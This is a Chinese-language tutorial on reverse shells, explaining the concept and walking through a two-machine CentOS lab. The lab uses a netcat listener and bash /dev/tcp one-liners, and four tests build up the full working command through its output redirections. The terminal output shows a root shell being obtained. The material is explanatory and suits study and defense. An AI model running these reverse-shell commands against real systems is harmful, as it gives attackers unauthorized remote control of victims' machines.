什么是反弹shell?
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况:
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
==============================================================
参考:
https://www.zhihu.com/question/24503813 知乎:反弹shell是什么意思啊?网上看了半天都没有相关的基础的解释?
反弹shell实验
环境:两台CentOS7.6服务器
- 攻击端 hacker:10.201.61.194
- 受害端 victim:10.201.61.195
1. 攻击端监听一个端口:
[root@hacker ~]# nc -lvp 6767
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
2.受害端生成一个反弹shell:
[root@victim ~]# bash -i >& /dev/tcp/10.201.61.194/6767 0>&1
3.攻击端已获取到受害端的bash:
[root@hacker ~]# nc -lvp 6767
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::6767
Ncat: Listening on 0.0.0.0:6767
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:46836.
[root@victim ~]# //攻击端已获得受害端的远程交互式shell
[root@victim ~]# hostname
hostname
victim
解释:
1. nc -lvp 6767
-l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。
2. bash -i
-i interactive。即产生一个交互式的shell(bash)。
3. /dev/tcp/IP/PORT
特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
通过以下4个小测试来分析反弹shell实现过程:
(PS: 注意执行步骤顺序)
测试1:
受害端:
[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566 //第二步
[root@victim ~]# hostname //第三步
[root@victim ~]#
攻击端:
[root@hacker ~]# nc -lvp 5566 //第一步
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:49018.
victim //测试1结果:实现了将受害端的标准输出重定向到攻击端,但是还没实现用命令控制受害端。
测试2:
受害端:
[root@victim ~]# bash -i < /dev/tcp/10.201.61.194/5566 //第二步
[root@victim ~]# hostname //测试2结果:实现了将攻击端的输入重定向到受害端,但是攻击端看不到命令执行结果。
victim
攻击端:
[root@hacker ~]# nc -lvp 5566 //第一步
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:50412.
hostname //第三步(攻击端执行命令)
测试3:
受害端:
[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566 0>&1 //第二步
[root@victim ~]# hostname //受害端回显命令
[root@victim ~]# id //受害端回显命令
[root@victim ~]# hahaha //受害端回显命令
bash: hahaha: command not found //受害端回显命令。显示错误命令的输出。
[root@victim ~]#
攻击端:
[root@hacker ~]# nc -lvp 5566 //第一步
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:36792.
hostname //第三步(攻击端执行命令)
victim
id //第四步(攻击端执行命令)
uid=0(root) gid=0(root) groups=0(root)
hahaha //第五步(执行一个错误的命令)
//测试3结果:基本实现了反弹shell的功能。但是受害端的机器上依然回显了攻击者机器上执行的命令,且攻击端看不到错误命令的输出。
测试4(将上面三个测试结合。将标准输入、标准输出、错误输出全都重定向到攻击端):
受害端:
[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566 0>&1 2>&1 //第二步。或 # bash -i &> /dev/tcp/10.201.61.194/5566 0>&1 (注:&>或>& 表示混合输出,即标准输出1 + 错误输出2)
攻击端:
[root@hacker ~]# nc -lvp 5566 //第一步
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:51182.
[root@victim ~]# hostname //第三步。测试4结果:攻击端已获得受害端的远程交互式shell,而且受害端没有再回显攻击端输入的命令~
hostname
victim
//PS:由测试3、测试4对比可见,标准错误2不仅显示错误信息的作用,居然还有回显输入命令和终端提示符的作用~~~
总结:
本文整理了反弹shell的一些资料并通过实验理解反弹shell原理。深入理解文件描述符和重定向才能更好弄懂反弹shell~
==============================================================
参考:
https://xz.aliyun.com/t/2549 先知社区:Linux 反弹shell(二)反弹shell的本质
https://www.freebuf.com/articles/system/153986.html FREEBUF:浅析重定向与反弹Shell命令